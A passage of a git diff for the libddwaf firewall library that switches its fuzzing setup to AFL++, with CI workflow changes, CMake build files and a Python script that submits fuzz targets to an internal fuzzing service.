diff --git a/.github/workflows/fuzz.yml b/.github/workflows/fuzz.yml index 476adcfed..55035bbd5 100644 --- a/.github/workflows/fuzz.yml +++ b/.github/workflows/fuzz.yml @@ -5,129 +5,182 @@ on: branches: - "**" push: - branches: [ master ] + branches: [master] tags: - "*" schedule: - - cron: 30 0 * * * + - cron: 30 0 * * * workflow_dispatch: inputs: duration: - description: 'Duration of the fuzzing run in seconds' + description: "Duration of the fuzzing run in seconds" required: true default: "60" type: string concurrency: group: ${{ github.workflow }}-${{ github.event.pull_request.number || github.ref }} cancel-in-progress: true + jobs: - # TODO: build all fuzzers first, then run independently - global-fuzzer: + build: runs-on: ubuntu-latest + outputs: + fuzzers: ${{ steps.list-fuzzers.outputs.fuzzers }} steps: - uses: actions/checkout@v4 with: submodules: recursive - - name: Install deps + - name: Install AFL++ and dependencies run: | - DEBIAN_FRONTEND="noninteractive" sudo apt-get -y remove python3-lldb-14 - sudo .github/workflows/scripts/llvm.sh 17 - DEBIAN_FRONTEND="noninteractive" sudo apt-get -y install libfuzzer-17-dev + sudo .github/workflows/scripts/llvm.sh 19 + sudo apt-get install -y build-essential cmake git curl python3 python3-pip ninja-build libssl-dev libcurl4-openssl-dev zlib1g-dev xxd - - name: Build - run: ./fuzzer/global/build.sh + - name: Install AFL++ + run: | + git clone https://github.com/AFLplusplus/AFLplusplus.git /tmp/AFLplusplus + cd /tmp/AFLplusplus + git checkout b89727bea903aec80d003b6764fb53c232d33d95 + make -j$(nproc) all + sudo make install - - name: Run fuzzer - run: ./fuzzer/global/run.sh ${{ github.event.inputs.duration }} + - name: Install afl-cov-fast + run: | + git clone --recursive https://github.com/airbus-seclab/afl-cov-fast.git /opt/afl-cov-fast + cd /opt/afl-cov-fast + git checkout 7a96b578bb227e874bf75f8cb759e8ac2b180453 + pip3 install -r requirements.txt + + - name: Create workspace and build + env: + CC: afl-clang-lto + CXX: afl-clang-lto++ + AFL_USE_ASAN: 1 + run: | + # Create /workspace and copy everything there + sudo mkdir -p /workspace + sudo cp -r . /workspace/ + sudo chown -R $(whoami):$(whoami) /workspace + cd /workspace + + # Run the build script logic directly + python3 fuzzer/global/scripts/build_corpus.py + + mkdir -p build + cd build + cmake .. \ + -DCMAKE_BUILD_TYPE=Debug \ + -DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer -O3 -g -fprofile-instr-generate -fcoverage-mapping" \ + -DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer -O3 -g -fprofile-instr-generate -fcoverage-mapping" + make -j$(nproc) + + cd ../fuzzer + mkdir -p build + cd build + cmake .. \ + -DCMAKE_BUILD_TYPE=Debug \ + -DLIBDDWAF_BUILD_FUZZER=ON \ + -DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer -O3 -g -fprofile-instr-generate -fcoverage-mapping" \ + -DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer -O3 -g -fprofile-instr-generate -fcoverage-mapping" + make -j$(nproc) + + - name: List available fuzzers + id: list-fuzzers + run: | + fuzzers=$(grep -A 20 "ALL_FUZZERS=(" fuzzer/docker/run_fuzzers.sh | grep -E '^\s*"[^"]*"' | sed 's/.*"\([^"]*\)".*/\1/' | jq -R -s -c 'split("\n")[:-1]') + echo "fuzzers=$fuzzers" >> $GITHUB_OUTPUT + echo "Found fuzzers: $fuzzers" + + - name: Package AFL++ and coverage tools + run: | + # Create AFL++ package + mkdir -p /tmp/afl-package/bin + mkdir -p /tmp/afl-package/opt - - name: Log - if: ${{ always() }} - run: grep -v -f fuzzer/global/scripts/report-negative-patterns.txt fuzzer/global/fuzz-*.log + # Package AFL++ binaries + cp /usr/local/bin/afl-* /tmp/afl-package/bin/ 2>/dev/null || true + cp /opt/AFLplusplus/afl-* /tmp/afl-package/bin/ 2>/dev/null || true - - name: Show coverage - run: ./fuzzer/global/scripts/show_coverage.sh 40 || true + # Package afl-cov-fast + cp -r /opt/afl-cov-fast /tmp/afl-package/opt/ - - name: Compress artifact - if: ${{ always() }} - run: tar -czvf fuzzing.tar.gz fuzzer/global/ + echo "AFL++ binaries:" + ls -la /tmp/afl-package/bin/ + echo "Coverage tools:" + ls -la /tmp/afl-package/opt/ - - name: Artifact + - name: Upload build artifacts uses: actions/upload-artifact@v4 - if: ${{ always() }} with: - name: fuzzing-data - path: fuzzing.tar.gz - local-fuzzer: + name: fuzzer-binaries + path: | + /workspace/fuzzer/build/*_fuzz + /workspace/build/ + /workspace/fuzzer/global/scripts/ + retention-days: 1 + + - name: Upload AFL++ binaries + uses: actions/upload-artifact@v4 + with: + name: afl-binaries + path: /tmp/afl-package/ + retention-days: 1 + + fuzzing: + needs: build runs-on: ubuntu-latest strategy: fail-fast: false matrix: - variant: - - fuzzer: uri_parse - params: "" - - fuzzer: ssrf_detector - params: "" - - fuzzer: lfi_detector - params: "" - - fuzzer: sql_tokenizer - params: "--dialect=mysql" - - fuzzer: sql_tokenizer - params: "--dialect=postgresql" - - fuzzer: sql_tokenizer - params: "--dialect=sqlite" - - fuzzer: sql_tokenizer - params: "--dialect=standard" - - fuzzer: sqli_detector - params: "--dialect=mysql" - - fuzzer: sqli_detector - params: "--dialect=postgresql" - - fuzzer: sqli_detector - params: "--dialect=sqlite" - - fuzzer: sqli_detector - params: "--dialect=standard" - - fuzzer: shell_tokenizer - params: "" - - fuzzer: shi_detector_string - params: "" - - fuzzer: shi_detector_array - params: "" - - fuzzer: cmdi_detector - params: "" - - fuzzer: sha256 - params: "" - - fuzzer: http_endpoint_fingerprint - params: "" - - fuzzer: http_header_fingerprint - params: "" - - fuzzer: http_network_fingerprint - params: "" - - fuzzer: session_fingerprint - params: "" - - fuzzer: jwt_decode - params: "" + fuzzer: ${{ fromJson(needs.build.outputs.fuzzers) }} steps: - uses: actions/checkout@v4 with: submodules: recursive - - name: Install deps + - name: Install runtime dependencies run: | - DEBIAN_FRONTEND="noninteractive" sudo apt-get -y remove python3-lldb-14 - sudo .github/workflows/scripts/llvm.sh 17 - DEBIAN_FRONTEND="noninteractive" sudo apt-get -y install libfuzzer-17-dev + # Install only runtime dependencies (no build tools needed) + sudo .github/workflows/scripts/llvm.sh 19 - - name: Build - env: - CC: clang-17 - CXX: clang++-17 + - name: Download AFL++ binaries + uses: actions/download-artifact@v4 + with: + name: afl-binaries + path: /tmp/afl-package + + - name: Install AFL++ binaries and coverage tools run: | - mkdir build ; cd build - cmake -DCMAKE_VERBOSE_MAKEFILE=1 -DCMAKE_BUILD_TYPE=RelWithDebInfo .. - make -j $(nproc) ${{ matrix.variant.fuzzer }}_fuzzer - cp fuzzer/${{ matrix.variant.fuzzer }}_fuzzer ../fuzzer/${{ matrix.variant.fuzzer }} + # Install AFL++ binaries + sudo cp /tmp/afl-package/bin/* /usr/local/bin/ + sudo chmod +x /usr/local/bin/afl-* + + # Install afl-cov-fast + sudo cp -r /tmp/afl-package/opt/afl-cov-fast /opt/ + cd /opt/afl-cov-fast + pip3 install -r requirements.txt + + afl-fuzz --help || echo "AFL++ installed successfully" + + - name: Setup workspace and download artifacts + run: | + sudo mkdir -p /workspace + sudo cp -r . /workspace/ + sudo chown -R $(whoami):$(whoami) /workspace + sudo chown -R $(whoami):$(whoami) /opt + + - name: Download build artifacts + uses: actions/download-artifact@v4 + with: + name: fuzzer-binaries + path: /workspace - name: Run fuzzer + env: + AFL_SKIP_CPUFREQ: 1 + AFL_I_DONT_CARE_ABOUT_MISSING_CRASHES: 1 + AFL_FAST_CAL: 1 run: | - cd fuzzer/${{ matrix.variant.fuzzer }} - ./${{ matrix.variant.fuzzer }}_fuzzer ${{ matrix.variant.params }} -max_total_time=${{ github.event.inputs.duration || 300 }} corpus/ + cd /workspace + chmod +x fuzzer/build/*_fuzz 2>/dev/null || true + ./fuzzer/docker/run_fuzzers.sh ${{ matrix.fuzzer }} diff --git a/.gitignore b/.gitignore index cb82b5acf..fbbd582c6 100644 --- a/.gitignore +++ b/.gitignore @@ -1,22 +1,25 @@ /Release /Debug /build +build/ +**/build/ PowerWAF.xcodeproj CMakeLists.txt.user compile_commands.json .cache .DS_Store + +/src/version.hpp +/tests/common/base_path.hpp tests/default.profraw perf/test_files/parsed_* perf/test_files/breakdown.numbers -/fuzzer/global/build /fuzzer/global/venv -/fuzzer/global/corpus - /fuzzer/global/sample_rules.yml +/fuzzer/e2e/src/ruleset/sample_rules.json /fuzzer/global/sample_dict.txt /fuzzer/global/fuzzer /fuzzer/global/libddwaf.a @@ -26,14 +29,32 @@ perf/test_files/breakdown.numbers /fuzzer/global/coverage.html /fuzzer/global/fuzz-*.log /fuzzer/global/results/crash-* +default.profraw +# AFL++ temporary files +*.cur_input +.afl_* +*.fuzz_* -/fuzzer/*/corpus/* -!/fuzzer/*/corpus/corpus-* +# Usual folders for testing afl fuzzers +o/ +i/ -/src/version.hpp -/tests/common/base_path.hpp +core.* +core + +# Sanitizer outputs +*.dSYM/ *.trace +# Fuzz binary are suffixed with _fuzz +*_fuzz +!*_fuzz.cpp + +CMakeCache.txt +CMakeFiles/ +cmake_install.cmake +Makefile + .vscode *.swp *.swo diff --git a/.gitlab-ci.yml b/.gitlab-ci.yml index c82a6e809..077cb2237 100644 --- a/.gitlab-ci.yml +++ b/.gitlab-ci.yml @@ -1,5 +1,7 @@ stages: - benchmarks + - fuzzing -include: ".gitlab/benchmarks.yml" - +include: + - ".gitlab/benchmarks.yml" + - ".gitlab/fuzzing.yml" diff --git a/.gitlab/fuzzing.yml b/.gitlab/fuzzing.yml new file mode 100644 index 000000000..a5c8fbfae --- /dev/null +++ b/.gitlab/fuzzing.yml @@ -0,0 +1,58 @@ +variables: + # Use the same base image as benchmarks as we know it should be able to build the fuzzers + BASE_CI_IMAGE: 486234852809.dkr.ecr.us-east-1.amazonaws.com/ci/benchmarking-platform:libddwaf + +run-fuzzing: + stage: fuzzing + tags: ["runner:apm-k8s-tweaked-metal"] + image: $BASE_CI_IMAGE + timeout: 30m + rules: + - if: '$CI_COMMIT_REF_NAME == "master" && $CI_PIPELINE_SOURCE == "schedule"' + - if: '$CI_COMMIT_REF_NAME == "master" && $CI_PIPELINE_SOURCE == "push"' + - if: '$CI_PIPELINE_SOURCE == "web"' + when: manual + before_script: | + VAULT_VERSION=1.20.2 + wget https://releases.hashicorp.com/vault/${VAULT_VERSION}/vault_${VAULT_VERSION}_linux_amd64.zip + unzip vault_${VAULT_VERSION}_linux_amd64.zip + mv vault /usr/bin/vault + chmod +x /usr/bin/vault + export PATH=/usr/bin:$PATH + + # TODO: MOVE THIS TO THE BASE IMAGE BUILD + + wget -O - https://apt.llvm.org/llvm-snapshot.gpg.key | apt-key add - + echo 'deb http://apt.llvm.org/jammy/ llvm-toolchain-jammy-19 main' | tee /etc/apt/sources.list.d/llvm-toolchain.list + apt-get update + + # Install dependencies matching your Dockerfile + .github/workflows/scripts/llvm.sh 19 + apt-get install -y build-essential cmake git curl python3 python3-pip ninja-build libssl-dev libcurl4-openssl-dev zlib1g-dev xxd + + # Install AFL++ + git clone https://github.com/AFLplusplus/AFLplusplus.git /tmp/AFLplusplus + cd /tmp/AFLplusplus + git checkout b89727bea903aec80d003b6764fb53c232d33d95 + make -j$(nproc) all + make install + + # Install afl-cov-fast + git clone --recursive https://github.com/airbus-seclab/afl-cov-fast.git /opt/afl-cov-fast + cd /opt/afl-cov-fast + git checkout 7a96b578bb227e874bf75f8cb759e8ac2b180453 + pip3 install -r requirements.txt + + script: | + # TODO: figure out what's the actual path to the source code instead of hardcoding it? + # Copy source code to /workspace where the build scripts expect it + mv /go/src/github.com/DataDog/apm-reliability/libddwaf /workspace + cd /workspace + echo "Starting fuzzing infrastructure setup..." + echo "Current commit: $CI_COMMIT_SHA" + echo "Current branch: $CI_COMMIT_REF_NAME" + echo "Current working directory: $(pwd)" + ls -la + python3 -m pip install requests + python3 /workspace/ci/scripts/fuzz_infra.py + echo "✅ Fuzzing setup completed successfully" diff --git a/CMakeLists.txt b/CMakeLists.txt index 8df874150..2dc19ee40 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -36,6 +36,7 @@ message(STATUS "Build type: ${CMAKE_BUILD_TYPE}") option(LIBDDWAF_BUILD_SHARED "Build shared library" ON) option(LIBDDWAF_BUILD_STATIC "Build shared library" ON) option(LIBDDWAF_TESTING "Load test subdirectories and targets" ON) +option(LIBDDWAF_BUILD_FUZZER "Build fuzzer targets (requires special setup)" OFF) option(LIBDDWAF_TEST_COVERAGE "Do coverage if possible" OFF) option(LIBDDWAF_VECTORIZED_TRANSFORMERS "Enable vectorization for transformers" ON) option(LIBDDWAF_ENABLE_LTO "Enable link-time optimisation" OFF) @@ -126,10 +127,13 @@ if (LIBDDWAF_TESTING) add_subdirectory(tests EXCLUDE_FROM_ALL) add_subdirectory(validator EXCLUDE_FROM_ALL) add_subdirectory(benchmark EXCLUDE_FROM_ALL) - add_subdirectory(fuzzer EXCLUDE_FROM_ALL) add_subdirectory(tools EXCLUDE_FROM_ALL) add_subdirectory(examples EXCLUDE_FROM_ALL) include(cmake/clang-tidy.cmake) include(cmake/clang-format.cmake) endif() + +if (LIBDDWAF_BUILD_FUZZER) + add_subdirectory(fuzzer EXCLUDE_FROM_ALL) +endif() diff --git a/ci/scripts/fuzz_infra.py b/ci/scripts/fuzz_infra.py new file mode 100644 index 000000000..7157332a6 --- /dev/null +++ b/ci/scripts/fuzz_infra.py @@ -0,0 +1,189 @@ +""" +Helper for running fuzz targets in the internal fuzzing infrastructure. +""" + +import os +import sys +import base64 + +import requests + +# replace me to "k9-libddwaf" once CHAOSPLT-991 is fixed. Lets not send empty bugreport to end users slacks +SLACK_CHANNEL = "fuzzing-ops" +REPOSITORY_URL = "https://github.com/DataDog/libddwaf" + +BUILD_BASE_PATH = "/workspace/fuzzer/build" +FUZZER_BASE_PATH = "/workspace/fuzzer" +CORPUS_PATH_PATTERN = "/workspace/fuzzer/{}/corpus" +API_URL = "https://fuzzing-api.us1.ddbuild.io/api/v1" +MAX_PKG_NAME_LENGTH = 50 + +def build_and_upload_fuzz(team="k9-libddwaf", core_count=2, duration=3600, proc_count=2, memory=4): + """ + This builds and uploads fuzz targets to the internal fuzzing infrastructure. + It needs to be passed the -fuzz flag in order to build the fuzz with efficient coverage guidance. + """ + + git_sha = os.popen("git rev-parse HEAD").read().strip() + + build_all() + + binaries = search_fuzzers(BUILD_BASE_PATH) + print(f"✅ Found {len(binaries)} fuzzers (e.g: {binaries[:5]}...)") + for binary in binaries: + pkgname = get_package_name(binary) + build_full_path = os.path.join(BUILD_BASE_PATH, binary) + print(f"Handling {pkgname} ({binary}) build_full_path: {build_full_path}") + if not os.path.exists(build_full_path): + print(f'❌ Build file {build_full_path} does not exist. Skipping...') + continue + + print(f"Uploading corpus for {pkgname} ({binary})...") + has_error = upload_corpus(pkgname, binary) + if has_error: + print(f'❌ Failed to upload corpus for {pkgname} ({binary}). Skipping fuzzer start...') + else: + print(f"✅ Uploaded corpus for {pkgname} ({binary})") + + print(f"Uploading binary for {pkgname} ({binary})...") + has_error = upload_binary(pkgname, binary, git_sha) + if has_error: + print(f'❌ Failed to upload binary for {pkgname}. Aborting') + return + else: + print(f"✅ Uploaded binary for {pkgname} ({binary})") + + print(f"Starting fuzzer for {pkgname} ({binary})...") + has_error = create_fuzzer(pkgname, binary, git_sha, core_count, duration, proc_count, memory, team, SLACK_CHANNEL, REPOSITORY_URL) + if has_error: + print(f'❌ Failed to create fuzzer for {pkgname} ({binary})') + else: + print(f"✅ Fuzzer created for {pkgname} ({binary})") + +def upload_corpus(pkgname, binary) -> bool: + has_errors = False + corpus_files_path = search_corpus(binary.replace("_fuzz", "")) + print(f'Uploading corpus (count: {len(corpus_files_path)}) for {pkgname} ({binary})...') + + # Get headers only once, so we don't have to call vault every time we upload a file + # Our current api doesn't support archive / batch upload yet (WIP) + headers = get_headers() + for file in corpus_files_path: + with open(file, "rb") as f: + data = f.read() + data = { + "content": base64.b64encode(data).decode("utf-8"), + } + try: + response = requests.post(f"{API_URL}/apps/{pkgname}/inputs", headers=headers, json=data, timeout=30) + response.raise_for_status() + except Exception as e: + print(f'❌ Failed to upload file for corpus, {pkgname} ({binary}): {e}') + print("Ignoring this file and continuing...") + has_errors = True + continue + + print(f'✅ Uploaded corpus for {pkgname} ({binary})...') + return has_errors + +def build_all(): + print("Building all fuzzers in path: ", os.getcwd()) + os.system("/workspace/fuzzer/docker/build.sh") + print("✅ Built all fuzzers") + +def get_package_name(binary): + return "libddwaf-" + binary.replace("_fuzz", "")[:MAX_PKG_NAME_LENGTH].replace("_", "-") # limit to 50 chars + +def search_fuzzers(directory): + def is_executable(file_path): + return os.path.isfile(file_path) and os.access(file_path, os.X_OK) + + binaries = [] + if os.path.isdir(directory): + for fname in os.listdir(directory): + fpath = os.path.join(directory, fname) + print(f"Checking fuzzer at path: {fpath}") + if not is_executable(fpath): + print(f"Skipping {fname} because it's not executable") + continue + if not fname.endswith("_fuzz"): + print(f"Skipping {fname} because it doesn't end with _fuzz") + continue + print(f"Adding {fname} to list of fuzzers") + binaries.append(fname) + return binaries + +# search for all file in the "corpus" subdirectory of the app, return a list of files +def search_corpus(appname): + corpus_path = CORPUS_PATH_PATTERN.format(appname) + print(f"Searching for corpus in {corpus_path}") + corpus_files_path = [] + if os.path.isdir(corpus_path): + for filename in os.listdir(corpus_path): + file_path = os.path.join(corpus_path, filename) + if os.path.isfile(file_path): + corpus_files_path.append(file_path) + + return corpus_files_path + +def create_fuzzer(pkgname, binary, git_sha, core_count, duration, proc_count, memory, team, slack_channel, repository_url) -> bool: + print(f'Starting fuzzer for {pkgname} ({binary})...') + # Start new fuzzer + run_payload = { + "app": pkgname, + "debug": False, + "version": git_sha, + "core_count": core_count, + "duration": duration, + "type": "aflpp", + "binary": binary, + "team": team, + "process_count": proc_count, + "memory": memory, + "slack_channel": SLACK_CHANNEL, + "repository_url": "https://github.com/DataDog/libddwaf", + } + try: + response = requests.post(f"{API_URL}/apps/{pkgname}/fuzzers", headers=get_headers(), json=run_payload, timeout=30) + response.raise_for_status() + print(f'✅ Started fuzzer for {pkgname} ({binary})...') + print(response.json()) + except Exception as e: + print(f'❌ Failed to start fuzzer for {pkgname} ({binary}): {e}') + return True + + return False + +def upload_binary(pkgname, binary, git_sha) -> bool: + try: + # Get presigned URL so we can use s3 uploading + print(f'Getting presigned URL for {pkgname}...') + presigned_response = requests.post( + f"{API_URL}/apps/{pkgname}/builds/{git_sha}/url", headers=get_headers(), timeout=30 + ) + presigned_response.raise_for_status() + presigned_url = presigned_response.json()["data"]["url"] + + print(f'Uploading {pkgname} ({binary}) for {git_sha}...') + # Upload file to presigned URL + build_full_path = os.path.join(BUILD_BASE_PATH, binary) + with open(build_full_path, 'rb') as f: + upload_response = requests.put(presigned_url, data=f, timeout=300) + upload_response.raise_for_status() + except Exception as e: + print(f'❌ Failed to upload binary for {pkgname} ({binary}): {e}') + return True + return False + +def get_headers(): + auth_header = os.popen("vault read -field=token identity/oidc/token/security-fuzzing-platform").read().strip() + return {"Authorization": f"Bearer {auth_header}", "Content-Type": "application/json"} + +if __name__ == "__main__": + print("🚀 Starting fuzzing infrastructure setup...") + try: + build_and_upload_fuzz() + print("✅ Fuzzing infrastructure setup completed successfully!") + except Exception as e: + print(f"❌ Failed to set up fuzzing infrastructure: {e}") + sys.exit(1) \ No newline at end of file diff --git a/cmake/embed_resources.cmake b/cmake/embed_resources.cmake new file mode 100644 index 000000000..01e2089f7 --- /dev/null +++ b/cmake/embed_resources.cmake @@ -0,0 +1,91 @@ +# Function to embed JSON files as C++ string literals using raw string literals +function(embed_json_files target_name) + set(oneValueArgs OUTPUT_FILE NAMESPACE) + set(multiValueArgs JSON_FILES) + cmake_parse_arguments(EMBED "" "${oneValueArgs}" "${multiValueArgs}" ${ARGN}) + + # Create the output directory + get_filename_component(OUTPUT_DIR ${EMBED_OUTPUT_FILE} DIRECTORY) + file(MAKE_DIRECTORY ${OUTPUT_DIR}) + + # Start building the header content + set(HEADER_CONTENT "// Auto-generated by CMake - DO NOT EDIT\n") + string(APPEND HEADER_CONTENT "#pragma once\n") + string(APPEND HEADER_CONTENT "#include \n") + string(APPEND HEADER_CONTENT "#include \n\n") + string(APPEND HEADER_CONTENT "namespace ${EMBED_NAMESPACE} {\n\n") + + # Process each JSON file + foreach(JSON_FILE ${EMBED_JSON_FILES}) + # Get the filename without extension for the variable name + get_filename_component(FILE_NAME ${JSON_FILE} NAME_WE) + + # Read the JSON file content + file(READ ${JSON_FILE} JSON_CONTENT) + + # Use raw string literal to avoid escaping issues (default being `")`, any json containing that would break) + # Generate a unique delimiter to avoid conflicts + string(RANDOM LENGTH 8 ALPHABET "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" DELIMITER) + set(RAW_DELIMITER "JSON_${DELIMITER}") + + # Add the raw string literal to header + string(APPEND HEADER_CONTENT "const std::string_view ${FILE_NAME}_json = R\"${RAW_DELIMITER}(${JSON_CONTENT})${RAW_DELIMITER}\";\n\n") + endforeach() + + + string(APPEND HEADER_CONTENT "} // namespace ${EMBED_NAMESPACE}\n") + + # Write the header file + file(WRITE ${EMBED_OUTPUT_FILE} "${HEADER_CONTENT}") + + # Add the generated file as a target dependency + add_custom_target(${target_name}_resources + DEPENDS ${EMBED_OUTPUT_FILE} + COMMENT "Generating embedded resources for ${target_name}" + ) +endfunction() + +# Function to embed YAML files as C++ string literals using raw string literals +function(embed_yaml_files target_name) + set(oneValueArgs OUTPUT_FILE NAMESPACE) + set(multiValueArgs YAML_FILES) + cmake_parse_arguments(EMBED "" "${oneValueArgs}" "${multiValueArgs}" ${ARGN}) + + # Create the output directory + get_filename_component(OUTPUT_DIR ${EMBED_OUTPUT_FILE} DIRECTORY) + file(MAKE_DIRECTORY ${OUTPUT_DIR}) + + # Start building the header content + set(HEADER_CONTENT "// Auto-generated by CMake - DO NOT EDIT\n") + string(APPEND HEADER_CONTENT "#pragma once\n") + string(APPEND HEADER_CONTENT "#include \n\n") + string(APPEND HEADER_CONTENT "namespace ${EMBED_NAMESPACE} {\n\n") + + # Process each YAML file + foreach(YAML_FILE ${EMBED_YAML_FILES}) + # Get the filename without extension for the variable name + get_filename_component(FILE_NAME ${YAML_FILE} NAME_WE) + + # Read the YAML file content + file(READ ${YAML_FILE} YAML_CONTENT) + + # Use raw string literal to avoid escaping issues + # Generate a unique delimiter to avoid conflicts + string(RANDOM LENGTH 8 ALPHABET "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" DELIMITER) + set(RAW_DELIMITER "YAML_${DELIMITER}") + + # Add the raw string literal to header + string(APPEND HEADER_CONTENT "const std::string_view ${FILE_NAME}_yaml = R\"${RAW_DELIMITER}(${YAML_CONTENT})${RAW_DELIMITER}\";\n\n") + endforeach() + + string(APPEND HEADER_CONTENT "} // namespace ${EMBED_NAMESPACE}\n") + + # Write the header file + file(WRITE ${EMBED_OUTPUT_FILE} "${HEADER_CONTENT}") + + # Add the generated file as a target dependency + add_custom_target(${target_name}_resources + DEPENDS ${EMBED_OUTPUT_FILE} + COMMENT "Generating embedded YAML resources for ${target_name}" + ) +endfunction() \ No newline at end of file diff --git a/fuzzer/CMakeLists.txt b/fuzzer/CMakeLists.txt index c86ceb8df..4b7910ac7 100644 --- a/fuzzer/CMakeLists.txt +++ b/fuzzer/CMakeLists.txt @@ -1,30 +1,190 @@ -MACRO(GET_DIRS subdirs parent) - FILE(GLOB children RELATIVE ${parent} ${parent}/*) - SET(subdirs "") - FOREACH(child ${children}) - IF(IS_DIRECTORY ${parent}/${child}) - LIST(APPEND subdirs ${child}) - ENDIF() - ENDFOREACH() -ENDMACRO() - -GET_DIRS(subdirs ${CMAKE_CURRENT_SOURCE_DIR}) - -set(LINK_COMPILE_FLAGS -fsanitize=fuzzer,address,undefined,leak -fprofile-instr-generate -fcoverage-mapping) - -gen_objects(fuzzer-common) -target_compile_options(fuzzer-common PRIVATE ${LINK_COMPILE_FLAGS}) - -foreach(dir ${subdirs}) - set(FUZZER_NAME "${dir}_fuzzer") - file(GLOB_RECURSE FUZZER_SOURCE ${dir}/src/*.cpp) - add_executable(${FUZZER_NAME} ${FUZZER_SOURCE}) - - set_target_properties(${FUZZER_NAME} PROPERTIES - COMPILE_FLAGS ${LINK_COMPILE_FLAGS} - LINK_FLAGS ${LINK_COMPILE_FLAGS}) - - target_include_directories(${FUZZER_NAME} PRIVATE ${LIBDDWAF_PUBLIC_INCLUDES} ${LIBDDWAF_PRIVATE_INCLUDES} ${CMAKE_CURRENT_SOURCE_DIR}/common/) - target_link_libraries(${FUZZER_NAME} PRIVATE fuzzer-common lib_yamlcpp) +cmake_minimum_required(VERSION 3.16) +project(libddwaf_afl_fuzzers) + +set(CMAKE_CXX_STANDARD 20) +set(CMAKE_CXX_STANDARD_REQUIRED ON) + +# Check if we're using an AFL++ compiler for fuzzing +# AFL++ fuzzers require afl-clang-fast, afl-clang-lto, or similar AFL-instrumented compilers +get_filename_component(COMPILER_NAME ${CMAKE_CXX_COMPILER} NAME) +if(NOT (COMPILER_NAME MATCHES "afl-clang" OR COMPILER_NAME MATCHES "afl\\+\\+")) + message(FATAL_ERROR + "AFL++ fuzzer build detected but compiler '${COMPILER_NAME}' is not an AFL compiler. " + "For proper fuzzing instrumentation, use afl-clang-fast, afl-clang-lto, or afl-clang-lto++. " + "Set CC=afl-clang-lto and CXX=afl-clang-lto++ before running cmake." + ) +endif() + +# Include our resource embedding function +include(${CMAKE_SOURCE_DIR}/../cmake/embed_resources.cmake) + +# Include directories will be applied per-target using LIBDDWAF variables from parent project +# Define the same variables as in objects.cmake but for the fuzzer context +set(LIBDDWAF_PUBLIC_INCLUDES ${CMAKE_SOURCE_DIR}/../include) +set(LIBDDWAF_PRIVATE_INCLUDES + ${CMAKE_SOURCE_DIR}/../src + ${CMAKE_SOURCE_DIR}/../src/vendor + ${CMAKE_SOURCE_DIR}/../src/vendor/libinjection/src/ + ${CMAKE_SOURCE_DIR}/../src/vendor/radixlib/ + ${CMAKE_SOURCE_DIR}/../src/vendor/lua-aho-corasick/ + ${CMAKE_SOURCE_DIR}/../src/vendor/utf8proc/ + ${CMAKE_SOURCE_DIR}/../src/vendor/re2/ +) + +# Add libddwaf as a dependency (assuming it's built in parent directory) +set(LIBDDWAF_BUILD_DIR "${CMAKE_SOURCE_DIR}/../build") +set(LIBDDWAF_SRC_DIR "${CMAKE_SOURCE_DIR}/../src") + +# Add the libddwaf library path +link_directories(${LIBDDWAF_BUILD_DIR}) + +# Add third_party dependencies (including RapidJSON) only if not already included +if(NOT TARGET lib_rapidjson) + add_subdirectory(../third_party third_party EXCLUDE_FROM_ALL) +endif() + +# Function to create a fuzzer target +function(add_afl_fuzzer target_name source_files) + add_executable(${target_name} ${source_files}) + + # Apply include directories to the target + target_include_directories(${target_name} + PUBLIC ${LIBDDWAF_PUBLIC_INCLUDES} + PRIVATE ${LIBDDWAF_PRIVATE_INCLUDES} + PRIVATE ${CMAKE_CURRENT_SOURCE_DIR}/common + ) + + # Link against necessary libraries + target_link_libraries(${target_name} + ${LIBDDWAF_BUILD_DIR}/libddwaf.a + lib_rapidjson + pthread + ) + + # Special handling for global fuzzer - needs YAML-CPP + if(${target_name} STREQUAL "global_fuzz") + target_link_libraries(${target_name} lib_yamlcpp) + endif() + # Add the json_utils.cpp source to the target + target_sources(${target_name} PRIVATE + ../tests/common/json_utils.cpp + ) + + # Include tests directory for json_utils.hpp + target_include_directories(${target_name} PRIVATE + ../tests + ) + + # Special handling for e2e fuzzer - embed JSON configs + if(${target_name} STREQUAL "e2e_fuzz") + # Find all JSON files in the e2e/src/ruleset directory + file(GLOB E2E_JSON_FILES "${CMAKE_CURRENT_SOURCE_DIR}/e2e/src/ruleset/*.json") + + # Generate embedded resources header + set(EMBEDDED_HEADER "${CMAKE_BINARY_DIR}/generated/embedded_configs.hpp") + embed_json_files(${target_name} + OUTPUT_FILE ${EMBEDDED_HEADER} + NAMESPACE "embedded_configs" + JSON_FILES ${E2E_JSON_FILES} + ) + + # Add the generated header to include path + target_include_directories(${target_name} PRIVATE ${CMAKE_BINARY_DIR}/generated) + + # Make sure the embedded resources are generated before building + add_dependencies(${target_name} ${target_name}_resources) + endif() + + # Special handling for global fuzzer - embed YAML config + if(${target_name} STREQUAL "global_fuzz") + # Find the sample_rules.yml file in the global directory + set(GLOBAL_YAML_FILE "${CMAKE_CURRENT_SOURCE_DIR}/global/sample_rules.yml") + + # Generate embedded resources header + set(EMBEDDED_HEADER "${CMAKE_BINARY_DIR}/generated/embedded_rules.hpp") + embed_yaml_files(${target_name} + OUTPUT_FILE ${EMBEDDED_HEADER} + NAMESPACE "embedded_rules" + YAML_FILES ${GLOBAL_YAML_FILE} + ) + + # Add the generated header to include path + target_include_directories(${target_name} PRIVATE ${CMAKE_BINARY_DIR}/generated) + + # Make sure the embedded resources are generated before building + add_dependencies(${target_name} ${target_name}_resources) + endif() + + # AFL++ instrumentation is handled automatically by afl compiler + # Set output directory + set_target_properties(${target_name} PROPERTIES + RUNTIME_OUTPUT_DIRECTORY ${CMAKE_BINARY_DIR} + ) +endfunction() + +# Create fuzzer targets +# Find all fuzzer targets in individual directories with src/main.cpp structure +file(GLOB FUZZER_SOURCES "*/src/main.cpp") + +set(FUZZER_TARGETS "") +set(CORPUS_DIRS "") + +foreach(FUZZER_SOURCE ${FUZZER_SOURCES}) + # Extract the directory name (fuzzer name) from the path + get_filename_component(FUZZER_DIR ${FUZZER_SOURCE} DIRECTORY) + get_filename_component(FUZZER_NAME ${FUZZER_DIR} DIRECTORY) + get_filename_component(FUZZER_NAME ${FUZZER_NAME} NAME) + + # Collect all source files for this fuzzer + 